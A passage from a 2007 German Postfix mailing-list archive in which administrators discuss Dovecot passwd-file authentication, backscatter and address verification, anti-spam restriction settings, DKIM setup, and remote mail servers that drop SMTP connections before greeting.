November 2007 18:35:39 Axel Steiner wrote: > Hi, > > > fetchmail (8 accounts) -> postfix -> dovecot deliver -> imap > > Momentan läuft alles noch über unix passwords, weshalb ich für > > Postfix in der > > main.cf local_recipient_maps = unix:passwd.byname $alias_map habe > > und für > > Dovecot nutze ich einfach passdb pam. > > Nun sollen noch ein paar User (genauer 5) hinzukommen, denen ich > > nicht allen > > einen unix account geben möchte, für SQL oder LDAP ist der (Heim-) > > Setup > > meiner Meinung nach aber zu klein... Gibt's was einfacheres? Für > > Postfix > > würde ich nach lesen der Doku vermutlich > > local_recipient_maps = unix:passwd.byname hash:/ > > somefilewiththerecipients > > nutzen, aber was ist mit Dovecot? Am liebsten hätte ich ein File > > mit Username > > + Password. > > bei Dovecot kannst Du auch einfach eine Datei angeben, dass geht mit > passwd-file > (http://wiki.dovecot.org/AuthDatabase/PasswdFile). Allerdings bin ich > mir grad nicht sicher, ob man Dovecot sagen kann, dass er in /etc/passwd > und in der Datei nachschauen soll. Das klingt gut, irgendwie hab ich mir die Dovecot Doku dazu noch nicht richtig angesehen. > Dann hast Du allerdings 2 Dateien, eine fuer Postfix und > eine fuer Dovecot. Ist immer noch weniger Aufwand als ein SQL > Backend ;-) Jo, das stimmt wohl :) Danke für den Hinweis. -- Greetings Chris From mrg at unimx.de Thu Nov 22 22:12:56 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 22 Nov 2007 22:12:56 +0100 Subject: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) In-Reply-To: <200711222030.52541.ml@awinkelmann.de> References: <0d1901c82c78$1eca2100$5c5e6300$@de> <200711221747.46797.ml@awinkelmann.de> <135c01c82d33$b8f38c10$2adaa430$@de> <200711222030.52541.ml@awinkelmann.de> Message-ID: <160e01c82d4c$7481d7d0$5d858770$@de> > Mail die z.B. von einem Server kommt der temp. Offline ist, würde diese > Mail ja abgelehnt. Hm hab ich was falsch gemacht? Meine Test wurden abgelehnt da der MX zu der Mail down (für ca 5 Testminuten) war. Habe einfach im recipient_restriction reject_unverified_recipient und reject_unverified_sender getan. address_verify_map hab ich allerdings leer. -----Ursprüngliche Nachricht----- Von: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users-bounces at listi.jpberlin.de] Im Auftrag von Andreas Winkelmann Gesendet: Donnerstag, 22. November 2007 20:31 An: postfixbuch-users at listi.jpberlin.de Betreff: Re: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) On Donnerstag, 22. November 2007, mrg at unimx.de wrote: > Danke, hatte ich schon gelesen. Scheinbar nicht oder nicht richtig. > Nur dabei war das Problem mit den Timeouts. > > Mail die z.B. von einem Server kommt der temp. Offline ist, würde diese > Mail ja abgelehnt. > http://www.postfix.org/ADDRESS_VERIFICATION_README.html -- Andreas -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From driessen at fblan.de Thu Nov 22 23:20:00 2007 From: driessen at fblan.de (Uwe Driessen) Date: Thu, 22 Nov 2007 23:20:00 +0100 Subject: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) In-Reply-To: <160e01c82d4c$7481d7d0$5d858770$@de> References: <0d1901c82c78$1eca2100$5c5e6300$@de> <200711221747.46797.ml@awinkelmann.de> <135c01c82d33$b8f38c10$2adaa430$@de><200711222030.52541.ml@awinkelmann.de> <160e01c82d4c$7481d7d0$5d858770$@de> Message-ID: <005701c82d55$d2ebfbd0$0565a8c0@uwe> mrg at unimx.de schrieb: > > Mail die z.B. von einem Server kommt der temp. Offline ist, würde diese > > Mail ja abgelehnt. > > Hm hab ich was falsch gemacht? Meine Test wurden abgelehnt da der MX zu der > Mail down (für ca 5 Testminuten) war. > Habe einfach im recipient_restriction > reject_unverified_recipient und reject_unverified_sender getan. Nichts gegen das verify aber es soll Server geben die einem eine Auszeit geben wenn man zu häufig mit dem kommt. Schau dir mal die nachfolgenden Optionen an die vor den permit_sasl eingetragen verhindern schon so einiges smtpd_recipient_restrictions = reject_unlisted_recipient, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_sender_domain, reject_unknown_recipient_domain, reject_unlisted_sender, und dann gibt es auch noch reject_invalid_helo_hostname, reject_non_fqdn_helo_hostname, reject_unauth_destination, >> reject_unknown_reverse_client_hostname, >> reject_unknown_client_hostname, die letzten beiden >> mit etwas Vorsicht genießen. Wer diese Restriktionen überlebt sollte in der Regel auch sauber zu bouncen sein (ausnahmen bestätigen aber die Regel *gg) smtpd_data_restrictions = reject_multi_recipient_bounce, reject_unauth_pipelining mit diesen Regeln wird nur sichergestellt das die Kommunikation vorwärts und rückwärts gehen sollte. Man fängt nur die plumpen spamer und infizierte Enduser Rechner so das noch genug für die User zum sortieren bleibt und für Amavis mehr wie genug zu tun ist. Was die einzelnen Restriktionen bewirken kannst du unter http://www.postfix.org/postconf.5.html nachlesen. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From anmeyer at anup.de Fri Nov 23 09:14:51 2007 From: anmeyer at anup.de (Andreas Meyer) Date: Fri, 23 Nov 2007 09:14:51 +0100 Subject: [Postfixbuch-users] aol.com connection Problem In-Reply-To: <200711220714.10156.ml@awinkelmann.de> References: <20071121200759.7f4d5673@gamma.meyer.home> <200711212152.40288.ml@awinkelmann.de> <20071121222710.5e434d97@gamma.meyer.home> <200711220714.10156.ml@awinkelmann.de> Message-ID: <20071123091451.32672e77@gamma.meyer.home> Andreas Winkelmann schrieb: > > Das mit dem a-Record hat mich auch verwundert. Mein Mailserver, das > > unbekannte Wesen. Was veranlaßt Postfix auf einen A-Record zu prüfen? > > Wenn Postfix keinen MX-Record zu einer Domain findet versucht es den A-Record. > > > Ja, ich habe einen eigenen DNS-Server, der die Root-Server befragt. > > Dann prüf ihn und natürlich auch den üblichen Verdächtigen chroot. Prüf ob das > eingeschaltet ist bzw. sich im chroot die richtigen Config-Dateien befindet. chroot hatte ich noch nie eingeschaltet. > > > Hast Du das mehrmals probiert? Evtl. ist was überlastet. > > > > mailin-02.mx.aol.com connected manchmal und manchmal schließt > > er gleich wieder die Verbindung, das macht mailin-03.mx.aol.com > > nicht: > > Evtl. einen Eintrag in der transport_maps für aol.com mit nem Pointer auf den > zuverlässigen. Danke für den Tip mit der transport_maps! Momentan nimmt AOl wieder mail an. Bei nochmaligem Problem werde ich einen Eintrag in die transport_maps machen. > Hmm, benutzt Du connection-caching? bzw. eine Postfix-Version die das kann? Um ehrlich zu sein, weis ich nicht, ob ich connection-caching benutze. mail_version = 2.3.4 Kann man das ein oder ausschalten? -- Andreas Meyer Mein öffentlicher GPG-Schlüssel unter: http://gpg-keyserver.de/pks/lookup?search=anmeyer&fingerprint=on&op=index From p.heinlein at heinlein-support.de Fri Nov 23 09:18:20 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Fri, 23 Nov 2007 09:18:20 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postfix/Amavis_Mailqueue-Verha?= =?iso-8859-1?q?lten_=E4ndern?= In-Reply-To: <200711221757.50223.ml@awinkelmann.de> References: <4745AE5D.6010208@fabianluetzenkirchen.de> <200711221750.01789.p.heinlein@heinlein-support.de> <200711221757.50223.ml@awinkelmann.de> Message-ID: <200711230918.20936.p.heinlein@heinlein-support.de> Am Donnerstag, 22. November 2007 schrieb Andreas Winkelmann: > > postconf -e "default_transport = hold" > > /etc/init.d/postfix reload > > "hold" ist nicht wirklich ein transport. Äh, sorry, vertippt. "defer" statt "hold" > Das was P. geschrieben hat mit defer_transports passt schon. Nur wollte > der OP noch "fetchmail ebenfalls queuen" was mir aber irgendwie nichts > sagt, Naja, fetchmail speist an localhost:25 ein, diese Mails gehen ebenfalls nach defer und alles ist prima. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From peter.bauernfeind at reba-eno.de Fri Nov 23 11:18:41 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Fri, 23 Nov 2007 11:18:41 +0100 Subject: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) In-Reply-To: <135c01c82d33$b8f38c10$2adaa430$@de> References: <0d1901c82c78$1eca2100$5c5e6300$@de> <002b01c82d16$73591ed0$0565a8c0@uwe> <116901c82d24$5f03b450$1d0b1cf0$@de> <200711221747.46797.ml@awinkelmann.de> <135c01c82d33$b8f38c10$2adaa430$@de> Message-ID: <4746A901.6020607@reba-eno.de> mrg at unimx.de schrieb: > Danke, hatte ich schon gelesen. > Nur dabei war das Problem mit den Timeouts. > > Mail die z.B. von einem Server kommt der temp. Offline ist, würde diese Mail > ja abgelehnt. > Wie meinst du das? Wenn ein sendender Server während der Übermittlung in Ohnmacht fällt hilft sowieso nichts mehr. Ansonsten ist doch da ein Handshake: Sender sagt den Empfänger ich habe etwas für dich Empfänger sagt: Moment bitte, habe gerade zu tun, komm später wieder. Oder er sagt: OK lass hören. Sender zum Empfänger: Ich bin der Soundso, komm aus dem Wald und habe gute Gaben. Empfänger zum Sender: Du kommst hier nicht rein. Oder: Ist klar gib her. Sender an Empfänder: Hier nimm [über gibt die Mail] So das wars, schönen Tag noch Empfänger an Sender: Alles klar, ich hagbe alles. Bis demnächst. Natürlich kommt dann im Anschluß noch eine Überprüfung der "Gabe". Dann wird sortiert und die guten werden geliefert und die überlagerten Packete mit Würmer und Viren einfach entsorgt. Das Zurücksenden funktioniert auch mit richtigen Waren nicht, sonst wäre es einfachh eine Briefbombe zum Sender zurückzuschicken. ;-) Und um noch einmal auf die Ignoranz deiner User einzugehen, entweder sie zahlen mehr, dann gibt es auch mehr, oder eben nicht. Aber die Ignoranz deiner User auf den Rücken unbeteiligter auszulassen ist mindestens schlechter Stil. Mit freundlichem Gruß Peter Bauernfeind From anmeyer at anup.de Fri Nov 23 11:22:29 2007 From: anmeyer at anup.de (Andreas Meyer) Date: Fri, 23 Nov 2007 11:22:29 +0100 Subject: [Postfixbuch-users] aol.com connection Problem In-Reply-To: <20071123091451.32672e77@gamma.meyer.home> References: <20071121200759.7f4d5673@gamma.meyer.home> <200711212152.40288.ml@awinkelmann.de> <20071121222710.5e434d97@gamma.meyer.home> <200711220714.10156.ml@awinkelmann.de> <20071123091451.32672e77@gamma.meyer.home> Message-ID: <20071123112229.1739ecb6@gamma.meyer.home> Andreas Meyer schrieb: > > Hmm, benutzt Du connection-caching? bzw. eine Postfix-Version die das kann? > > Um ehrlich zu sein, weis ich nicht, ob ich connection-caching benutze. > mail_version = 2.3.4 > Kann man das ein oder ausschalten? OK http://www.postfix.org/CONNECTION_CACHE_README.html -- Andreas Meyer Mein öffentlicher GPG-Schlüssel unter: http://gpg-keyserver.de/pks/lookup?search=anmeyer&fingerprint=on&op=index From Ralf.Hildebrandt at charite.de Fri Nov 23 13:54:39 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Fri, 23 Nov 2007 13:54:39 +0100 Subject: [Postfixbuch-users] DKIM und Postfix In-Reply-To: <20071123131950.428218f6@greulix.scheeder.de> References: <20071123131950.428218f6@greulix.scheeder.de> Message-ID: <20071123125438.GE29431@charite.de> * Daniel Schulz : > Hallo, > > ich habe ein paar Fragen zu DKIM und Postfix: > > Wie schaut es mit der DKIM-Unterstützung in Postfix aus? Gibt es > HowTo's, wie man beides verheiratet und einrichtet? Habe bisher noch > nicht viel hilfreiches in google gefunden. http://www.ijs.si/software/amavisd/amavisd-new-docs.html#dkim > Ist es in Deutschland bereits im Einsatz? Ja. > Ist es ratsam, einen Firmen-Mailserver auf DKIM umzustellen? Ja > Hat es hier schon jemand produktiv im Einsatz? Ja -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de And others again have been told what a Unix would be and how it is working. If this people are extraterrestrial or an ancient mainframe-team of IBM (the difference is not that big), and they then try to build a Unix, you will get a AIX 2 and 3 - a hybride monster with green blood which will not kill you maybe, but when you look at the innwards you wish you where dead afterwards. From driessen at fblan.de Fri Nov 23 14:00:17 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 23 Nov 2007 14:00:17 +0100 Subject: [Postfixbuch-users] DKIM und Postfix In-Reply-To: <20071123131950.428218f6@greulix.scheeder.de> References: <20071123131950.428218f6@greulix.scheeder.de> Message-ID: <000401c82dd0$cbd04290$0565a8c0@uwe> Daniel Schulz schrieb: > Wie schaut es mit der DKIM-Unterstützung in Postfix aus? Gibt es > HowTo's, wie man beides verheiratet und einrichtet? Habe bisher noch > nicht viel hilfreiches in google gefunden. http://www.postfix.org/MILTER_README.html > > Ist es in Deutschland bereits im Einsatz? Ist es ratsam, einen > Firmen-Mailserver auf DKIM umzustellen? Hat es hier schon jemand > produktiv im Einsatz? Ich kenne es bis dato nur bei Amavis und da habe ich es abgeschaltet. Ob es für den Firmenserver sinnvoll ist musst du entschieden (mehr Aufwand, zusätzliche Abfragen ins Netz). Wird erst wirklich Bedeutung erlangen wenn es einfach und sicher einzubinden ist. Hast du irgendwelche Probleme mit dem Abliefern von Mails? > > Gruß > Daniel Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From christian at bricart.de Fri Nov 23 15:03:59 2007 From: christian at bricart.de (Christian Bricart) Date: Fri, 23 Nov 2007 15:03:59 +0100 (CET) Subject: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? Message-ID: <36854.80.87.162.65.1195826639.squirrel@aachalon.de> Tach zusammen, hab ich was verpasst, oder ist jetzt neue Mode erst "abzunehmen" und dann sofort "aufzulegen"...? Ist das ein Rate-Limiting..? server:~# telnet mail.example.com 25 Trying xxx.xxx.xxx.xxx Connected to mail.example.com. Escape character is '^]'. Connection closed by foreign host. server:~# Ergebnis: eine volle defer-Queue mit Fehler: "server dropped connection without sending the initial SMTP greeting".. Und das bei völlig unterschiedlichen MXen quer durch die Welt.. scheint also nicht am Ziel-MX zu liegen. Dazwiwschen laufen allerdings auch jede Menge korrekt zugestellte Mails.. direkt im Anschluss an den Test oben, ein telnet auf Port 25 eines anderen Mailservers.. funtzt auch super - also liegt es auch nicht an mir, oder? Reproduzierbar: telnet mail.example.com 25 ... Connection closed by foreign host. - Connection closed by foreign host. - Connection closed by foreign host. -- (<- also den anderen Telnet direkt dahinter ausgeführt..) 220 other.example.net ESMTP Postfix Ziemlich zeitgleich auf nen andern Rechner und den "kaputten" MX von dort versucht: 220 mail.example.com ESMTP Postfix Ideen..? Ähnliche Erfahrungen..? Christian From mhaegele at linuxrocks.dyndns.org Fri Nov 23 15:16:39 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Fri, 23 Nov 2007 15:16:39 +0100 Subject: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? In-Reply-To: <36854.80.87.162.65.1195826639.squirrel@aachalon.de> References: <36854.80.87.162.65.1195826639.squirrel@aachalon.de> Message-ID: <4746E0C7.5060200@linuxrocks.dyndns.org> Christian Bricart schrieb: > Tach zusammen, > > hab ich was verpasst, oder ist jetzt neue Mode erst "abzunehmen" und dann > sofort "aufzulegen"...? Ist das ein Rate-Limiting..? > > server:~# telnet mail.example.com 25 > Trying xxx.xxx.xxx.xxx > Connected to mail.example.com. > Escape character is '^]'. > Connection closed by foreign host. > server:~# > > Ergebnis: eine volle defer-Queue mit Fehler: "server dropped connection > without sending the initial SMTP greeting".. > Und das bei völlig unterschiedlichen MXen quer durch die Welt.. scheint > also nicht am Ziel-MX zu liegen. > Dazwiwschen laufen allerdings auch jede Menge korrekt zugestellte Mails.. > > direkt im Anschluss an den Test oben, ein telnet auf Port 25 eines anderen > Mailservers.. funtzt auch super - also liegt es auch nicht an mir, oder? > > Reproduzierbar: > > telnet mail.example.com 25 > ... > Connection closed by foreign host. > - > Connection closed by foreign host. > - > Connection closed by foreign host. > -- (<- also den anderen Telnet direkt > dahinter ausgeführt..) > 220 other.example.net ESMTP Postfix > > Ziemlich zeitgleich auf nen andern Rechner und den "kaputten" MX von dort > versucht: > 220 mail.example.com ESMTP Postfix > > Ideen..? > Ähnliche Erfahrungen..? Nö. Kannst mal ein Beispiel geben, einen Server nennen der das macht? > Christian -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From christian at bricart.de Fri Nov 23 15:27:46 2007 From: christian at bricart.de (Christian Bricart) Date: Fri, 23 Nov 2007 15:27:46 +0100 (CET) Subject: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? In-Reply-To: <4746E0C7.5060200@linuxrocks.dyndns.org> References: <36854.80.87.162.65.1195826639.squirrel@aachalon.de> <4746E0C7.5060200@linuxrocks.dyndns.org> Message-ID: <35743.80.87.162.65.1195828066.squirrel@aachalon.de> Matthias Haegele wrote: > Christian Bricart schrieb: >> Tach zusammen, >> >> hab ich was verpasst, oder ist jetzt neue Mode erst "abzunehmen" und >> dann >> sofort "aufzulegen"...? Ist das ein Rate-Limiting..? >> >> server:~# telnet mail.example.com 25 >> Trying xxx.xxx.xxx.xxx >> Connected to mail.example.com. >> Escape character is '^]'. >> Connection closed by foreign host. >> server:~# >> >> Ergebnis: eine volle defer-Queue mit Fehler: "server dropped connection >> without sending the initial SMTP greeting".. >> Und das bei völlig unterschiedlichen MXen quer durch die Welt.. scheint >> also nicht am Ziel-MX zu liegen. >> Dazwiwschen laufen allerdings auch jede Menge korrekt zugestellte >> Mails.. >> >> direkt im Anschluss an den Test oben, ein telnet auf Port 25 eines >> anderen >> Mailservers.. funtzt auch super - also liegt es auch nicht an mir, oder? >> >> Reproduzierbar: >> >> telnet mail.example.com 25 >> ... >> Connection closed by foreign host. >> - >> Connection closed by foreign host. >> - >> Connection closed by foreign host. >> -- (<- also den anderen Telnet direkt >> dahinter ausgeführt..) >> 220 other.example.net ESMTP Postfix >> >> Ziemlich zeitgleich auf nen andern Rechner und den "kaputten" MX von >> dort >> versucht: >> 220 mail.example.com ESMTP Postfix >> >> Ideen..? >> Ähnliche Erfahrungen..? > > Nö. Kannst mal ein Beispiel geben, einen Server nennen der das macht? mail02.interchangeusa.com telnet orgonics.com 25 ... From cite at incertum.net Fri Nov 23 15:45:08 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 23 Nov 2007 15:45:08 +0100 Subject: [Postfixbuch-users] DKIM und Postfix In-Reply-To: <20071123131950.428218f6@greulix.scheeder.de> References: <20071123131950.428218f6@greulix.scheeder.de> Message-ID: <20071123144508.GT11675@mail.incertum.net> * Daniel Schulz wrote: > Wie schaut es mit der DKIM-Unterstützung in Postfix aus? Gibt es > HowTo's, wie man beides verheiratet und einrichtet? Habe bisher noch > nicht viel hilfreiches in google gefunden. Die Milter für DomainKeys und DKIM funktionieren nicht nur mit sendmail, sondern auch mit Postfix (auch wenn Wietse dringend ein Postfix er 2.4-Reihe empfiehlt). Die Einrichtung ist mehr oder weniger trivial, siehe auch: http://www.elandsys.com/resources/sendmail/dkim.html Die sendmail-spezifischen Teile kann man dabei leicht überspringen. Für Debian/stable habe ich vor längerer Zeit mal Backports gebaut. > Ist es in Deutschland bereits im Einsatz? Ist es ratsam, einen > Firmen-Mailserver auf DKIM umzustellen? Hat es hier schon jemand > produktiv im Einsatz? Seit einiger Zeit im Einsatz, bisher keinerlei negative Effekte bemerken können - na ja, gut, die beiden Milter schlucken etwas sehr viel RAM, aber das ist verschmerzbar. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #222: Reingewinn - Der Teil der Bilanz, den der Vorstand beim besten Willen nicht mehr vor den Aktionären verstecken kann. (Carl Fürstenberg) From mhaegele at linuxrocks.dyndns.org Fri Nov 23 15:47:32 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Fri, 23 Nov 2007 15:47:32 +0100 Subject: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? In-Reply-To: <35743.80.87.162.65.1195828066.squirrel@aachalon.de> References: <36854.80.87.162.65.1195826639.squirrel@aachalon.de> <4746E0C7.5060200@linuxrocks.dyndns.org> <35743.80.87.162.65.1195828066.squirrel@aachalon.de> Message-ID: <4746E804.1000100@linuxrocks.dyndns.org> Christian Bricart schrieb: > Matthias Haegele wrote: [...] >>> Ideen..? >>> Ähnliche Erfahrungen..? >> Nö. Kannst mal ein Beispiel geben, einen Server nennen der das macht? > > mail02.interchangeusa.com dig -t mx interchangeusa.com ; <<>> DiG 9.3.4 <<>> -t mx interchangeusa.com ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26612 ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;interchangeusa.com. IN MX ;; ANSWER SECTION: interchangeusa.com. 86400 IN MX 5 mail02.local.com. interchangeusa.com. 86400 IN MX 0 mail01.local.com. ^^^^^^^^^^^^^^^^ telnet mail02.local.com 25 Trying 70.167.155.148... Connected to mail02.local.com. Escape character is '^]'. 220 mail02.local.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready at Fri, 23 Nov 2007 06:42:20 -0800 ehlo hermes.linuxrocks.dyndns.org 250-mail02.local.com Hello [213.239.199.112] 250-TURN 250-SIZE 51200000 250-ETRN 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-8bitmime 250-BINARYMIME 250-CHUNKING 250-VRFY 250 OK > telnet orgonics.com 25 > ... Da liefert google eine Menge ... -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From christian at bricart.de Fri Nov 23 15:54:54 2007 From: christian at bricart.de (Christian Bricart) Date: Fri, 23 Nov 2007 15:54:54 +0100 (CET) Subject: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? In-Reply-To: <4746E804.1000100@linuxrocks.dyndns.org> References: <36854.80.87.162.65.1195826639.squirrel@aachalon.de> <4746E0C7.5060200@linuxrocks.dyndns.org> <35743.80.87.162.65.1195828066.squirrel@aachalon.de> <4746E804.1000100@linuxrocks.dyndns.org> Message-ID: <56397.80.87.162.65.1195829694.squirrel@aachalon.de> Matthias Haegele wrote: > Christian Bricart schrieb: >> Matthias Haegele wrote: > > [...] > >>>> Ideen..? >>>> Ähnliche Erfahrungen..? >>> Nö. Kannst mal ein Beispiel geben, einen Server nennen der das macht? >> >> mail02.interchangeusa.com > > dig -t mx interchangeusa.com nicht nachkucken - das war bereits der MX! :-) >> telnet orgonics.com 25 >> ... > > Da liefert google eine Menge ... von mir aus - ich kann dir natürlich auch die komplette Liste mit 200-300 MXen schicken, die du alle durchprobieren kannst.. das waren exemplarisch völlig wahrlos zwei aus dem scroll von "mailq" gegriffen... ;-) Christian From driessen at fblan.de Fri Nov 23 15:57:23 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 23 Nov 2007 15:57:23 +0100 Subject: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? In-Reply-To: <36854.80.87.162.65.1195826639.squirrel@aachalon.de> References: <36854.80.87.162.65.1195826639.squirrel@aachalon.de> Message-ID: <000b01c82de1$27b39070$0565a8c0@uwe> Christian Bricart schrieb: > > hab ich was verpasst, oder ist jetzt neue Mode erst "abzunehmen" und dann > sofort "aufzulegen"...? Ist das ein Rate-Limiting..? Passiert mir auch ab und an wenn ich mich zu zackig melde das dem Gegenüber der Hörer aus der Hand fällt *gg > Ähnliche Erfahrungen..? Ab und an mit GMX und Yahoo das die mich sofort erstmal rauswerfen > > Christian Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From driessen at fblan.de Fri Nov 23 16:10:58 2007 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 23 Nov 2007 16:10:58 +0100 Subject: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? In-Reply-To: <000b01c82de1$27b39070$0565a8c0@uwe> References: <36854.80.87.162.65.1195826639.squirrel@aachalon.de> <000b01c82de1$27b39070$0565a8c0@uwe> Message-ID: <000c01c82de3$0d56d640$0565a8c0@uwe> > -----Original Message----- > From: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users- > bounces at listi.jpberlin.de] On Behalf Of Uwe Driessen > Sent: Friday, November 23, 2007 3:57 PM > To: 'Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein.' > Subject: Re: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? > > Christian Bricart schrieb: > > > > hab ich was verpasst, oder ist jetzt neue Mode erst "abzunehmen" und dann > > sofort "aufzulegen"...? Ist das ein Rate-Limiting..? > > Passiert mir auch ab und an wenn ich mich zu zackig melde das dem Gegenüber der Hörer > aus > der Hand fällt *gg > > > Ähnliche Erfahrungen..? > > Ab und an mit GMX und Yahoo das die mich sofort erstmal rauswerfen > Könnte das evtl. sein das diese Mailserver ESMTP auf den Fahnen stehen haben aber nur smtp sprechen ? Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From christian at bricart.de Fri Nov 23 16:22:19 2007 From: christian at bricart.de (Christian Bricart) Date: Fri, 23 Nov 2007 16:22:19 +0100 (CET) Subject: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? In-Reply-To: <000c01c82de3$0d56d640$0565a8c0@uwe> References: <36854.80.87.162.65.1195826639.squirrel@aachalon.de> <000b01c82de1$27b39070$0565a8c0@uwe> <000c01c82de3$0d56d640$0565a8c0@uwe> Message-ID: <32769.80.87.162.65.1195831339.squirrel@aachalon.de> Uwe Driessen wrote: > >> -----Original Message----- >> From: postfixbuch-users-bounces at listi.jpberlin.de >> [mailto:postfixbuch-users- >> bounces at listi.jpberlin.de] On Behalf Of Uwe Driessen >> Sent: Friday, November 23, 2007 3:57 PM >> To: 'Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein.' >> Subject: Re: [Postfixbuch-users] neues Rate-Limiting im Umlauf..? >> >> Christian Bricart schrieb: >> > >> > hab ich was verpasst, oder ist jetzt neue Mode erst "abzunehmen" und >> dann >> > sofort "aufzulegen"...? Ist das ein Rate-Limiting..? >> >> Passiert mir auch ab und an wenn ich mich zu zackig melde das dem >> Gegenüber der Hörer >> aus >> der Hand fällt *gg >> >> > Ähnliche Erfahrungen..? >> >> Ab und an mit GMX und Yahoo das die mich sofort erstmal rauswerfen >> > > Könnte das evtl. sein das diese Mailserver ESMTP auf den Fahnen stehen > haben aber nur smtp > sprechen ? keine Ahnung? bis zur Server-Greeting kommt man ja nicht ;-) ich hab dann doch mal flott ne Liste gemacht (sortiert nach Anzahl der nach mail.log produzierten Fehler bis minimal 3-stelliger Anzahl): 6053 orgonics.com[130.94.157.19]: 5604 mail.searchhound.com[67.15.68.32]: 3936 mail02.interchangeusa.com[63.251.210.81]: 685 fsumsg7.ferris.edu[161.57.5.88]: 608 email-filter1.nn.k12.va.us[206.246.197.11]: 607 email-filter2.nn.k12.va.us[206.246.197.20]: 563 fsumsg6.ferris.edu[161.57.5.84]: 547 mail.delphiq.com[213.123.232.16]: 473 fsumsg3.ferris.edu[161.57.5.68]: 437 mail2.axima.de[212.184.123.107]: 437 mail1.axima.de[212.184.123.106]: 425 gbrsecurity02.telesp.net.br[200.171.222.87]: 373 gbrsecurity.telesp.net.br[200.171.222.88]: 340 f2-h-mailman.infosys.de[194.97.60.179]: 281 mail.aximaref.de[212.184.123.106]: 201 MAIL.bellamylaw.com[24.199.251.44]: 198 mail1.optima.net[206.186.57.42]: 185 smtp.atl.cbeyond.com[66.180.96.29]: 159 mx05.cside.jp[210.166.236.162]: 150 mx3.cudamail.com[64.34.241.5]: 143 mail-kr.bigfoot.com[211.115.216.222]: 141 mail-kr.bigfoot.com[211.115.216.226]: 133 dp123.fstinc.com[206.166.181.163]: 131 mail-kr.bigfoot.com[211.115.216.225]: 122 mx.nat-mail.com[66.161.86.166]: 122 mail-kr6.bigfoot.com[211.115.216.222]: 121 mx.nat-mail.com[66.161.86.165]: 115 mail-kr3.bigfoot.com[211.115.216.226]: 112 lexingtonsc.assetrealtyinc.com[::ffff:208.254.9.228]: 112 lexingtonsc.assetrealtyinc.com[208.254.9.228]: 110 MX.tecnoconsult.com[66.175.112.252]: 106 halo.ispgateway.de[80.67.18.19]: 101 mail-kr2.bigfoot.com[211.115.216.225]: .... Christian From mrg at unimx.de Fri Nov 23 16:34:39 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Fri, 23 Nov 2007 16:34:39 +0100 Subject: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) In-Reply-To: <4746A901.6020607@reba-eno.de> References: <0d1901c82c78$1eca2100$5c5e6300$@de> <002b01c82d16$73591ed0$0565a8c0@uwe> <116901c82d24$5f03b450$1d0b1cf0$@de> <200711221747.46797.ml@awinkelmann.de> <135c01c82d33$b8f38c10$2adaa430$@de> <4746A901.6020607@reba-eno.de> Message-ID: <16db01c82de6$5c5288e0$14f79aa0$@de> Danke für die anschauliche Antwort. Ich habe bei meinen Tests einen Fehler gemacht. Ich habe ein SMTP Tool verwendet, dieses spoolt natürlich nicht die temp Errors des Postfixes wenn er gerade verify durchführt. Ein richtiger sendender Server würde den temp Error 450 ja spoolen und kurze 